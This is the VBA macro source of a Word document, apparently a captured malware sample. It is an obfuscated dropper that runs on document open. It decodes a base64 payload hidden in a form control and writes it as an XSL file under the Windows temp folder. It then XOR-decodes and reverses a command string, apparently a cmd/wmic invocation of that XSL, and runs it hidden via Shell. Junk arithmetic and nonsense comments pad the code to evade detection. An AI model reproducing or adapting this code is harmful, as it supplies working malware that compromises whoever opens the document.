Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call main
End Sub
Attribute VB_Name = "a2FvgO"
Function aZKUHg(aPeOY, aNoIB)
aZKUHg = aPeOY Xor aNoIB
End Function
Public Sub anUHDb(aUYG7)
Dim aymoV As Integer
Dim a8WLYs As Long
aymoV = 60
a8WLYs = 51
aaCPX = aymoV + a8WLYs
' Exclude leave comment parasite reminder in- licensed

Set apTF6D = CreateObject("Scripting.FileSystemObject")
Dim a53Dw As Integer
a53Dw = 13972 * 1
' Aperture ncaa zone cashier

Dim aJntQS
For aJntQS = 18 To 51
Debug.Print Error(aJntQS)
Next aJntQS
Set aMegW = apTF6D.CreateTextFile(ahzuX & as46g & auHMZa & "p" & "\" & "\a2uLwJ.xsl", 1)
Dim aOtJs
Dim ao38j4 As Long
aOtJs = 41
ao38j4 = 56
atERP6 = aOtJs / ao38j4
' Richardson rhetorical
aMegW.Write aUYG7
aMegW.Close
End Sub
Sub aH2ON(aiZQJ)
Dim aWyDc As Long
aWyDc = 21829 + 2
' Fridge little available appraised conjunctions sardonic
Dim aozwVB As Integer
Dim aKmsb As Integer
aozwVB = 20298 / 199
aKmsb = 597 - 589
ahr5J = aozwVB + aKmsb
Call Interaction$.Shell@(StrReverse(aiZQJ), 0)

Dim a8azbW
For a8azbW = 17 To 53
Debug.Print Error(a8azbW)
Next a8azbW
' Community parking dee http tangible

Dim atPrDY
For atPrDY = 5 To 43
Debug.Print Error(atPrDY)
Next atPrDY
' Frank arcade high-pitched blink cartridges
Dim a135n As Integer
Dim aCkOet
a135n = -181 + 283
aCkOet = 1218 - 1196
as8wp = a135n + aCkOet
End Sub
Attribute VB_Name = "aCDmc5"
Public Const ahzuX As String = "c:\"
Public Const as46g As String = "\window"
Public Const auHMZa As String = "s\\tem"
Function arunF(a5rlt)

Dim aEbnXk
For aEbnXk = 2 To 37
Debug.Print Error(aEbnXk)
Next aEbnXk
arunF = UBound(a5rlt)
End Function
Function a5eUsW(a5rlt, aSfgzR)
Dim a8g7dX
a8g7dX = 22686 * 1
' Phillips opposite
a3LQV = ""
Dim a7Xmed As Integer
Dim aR9Yi
a7Xmed = 22
aR9Yi = 57
az2WPG = a7Xmed * aR9Yi
' Precipitately selection charter pyrites
For aiojN = 0 To arunF(a5rlt)
ad0ALu = aZKUHg(a5rlt(aiojN), aSfgzR)
a3LQV = a3LQV & Chr(ad0ALu)
Next
a5eUsW = a3LQV
End Function
Attribute VB_Name = "aCKDz"
Attribute VB_Base = "0{BB012B3E-9AEE-426D-A5B7-3FD2D26F1ECC}{C19917BA-D38D-4591-9879-7F21000997F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aTfbR"
Function arKS7()
arKS7 = Array(111, 33, 62, 53, 99, 7, 58, 1, 56, 127, 44, 17, 61, 32, 40, 57, 17, 62, 58, 34, 41, 35, 36, 58, 17, 119, 46, 111, 119, 57, 44, 32, 63, 34, 43, 98, 109, 57, 62, 36, 33, 109, 62, 62, 40, 46, 34, 63, 61, 109, 46, 36, 32, 58, 109, 46, 98, 109, 41, 32, 46)
End Function
Function aBRK8()
aBRK8 = aCKDz.x.Text
End Function
Sub main()
Dim aic5CJ As String
Dim aB0JL
aB0JL = 1991 * 2
' Wrest trollope updating gent trek
axPB6 = 28336 / 368
Dim aGdS0 As Long
aGdS0 = 8187 * 2
' Talmud cms fwd greener lugger
aic5CJ = a5eUsW(arKS7, axPB6)

Dim a7C5tZ As Integer
Dim aYKmU As Integer
a7C5tZ = 20274 / 186
aYKmU = 21
alWwT = a7C5tZ - aYKmU
' Billiard adjustments boeotia eds ven
Dim ayobI As String

Dim ar7Sz
For ar7Sz = 22 To 36
Debug.Print Error(ar7Sz)
Next ar7Sz
' Id
ayobI = aVfdu(aBRK8())
Dim acerN As Long
Dim aQAE3X
acerN = 208 - 107
aQAE3X = -484 + 531
aVB3Q = acerN * aQAE3X
' Simulate variation go constitutes
anUHDb ayobI
Call aH2ON(aic5CJ)

Dim aS3y1 As Integer
Dim aArxj As Integer
aS3y1 = 525 - 478
aArxj = 22
aNJM1 = aS3y1 + aArxj
' Parsimony compaq toddler this nut inviolable

End Sub
Attribute VB_Name = "aYrRz"
Function aVfdu(apIrW6 As String)
Dim aXC0Eh As Long
aXC0Eh = 25210 * 1
' Disapproval exclusive
Dim a5uhVb
a5uhVb = 5958 - 5
' Physiognomy reprimand liked potency pouch digital
Dim aSMOnT As Integer
aSMOnT = 31373 * 1
' Gba um nw vex
Set a19fKw = New MSXML2.DOMDocument
Dim aYWGIm
Dim a1dWo As Integer
aYWGIm = 37
a1dWo = 565 - 509
aso3B = aYWGIm * a1dWo
' Clam
Set a78Sq = a19fKw.createElement("b64")
a78Sq.DataType = "bin.base64"
a78Sq.Text = apIrW6
Dim asr8O As Integer
asr8O = 27760 * 1
' Transcend romany forum
aVfdu = StrConv(a78Sq.nodeTypedValue, vbUnicode)

End Function


INQUEST-PP=macro
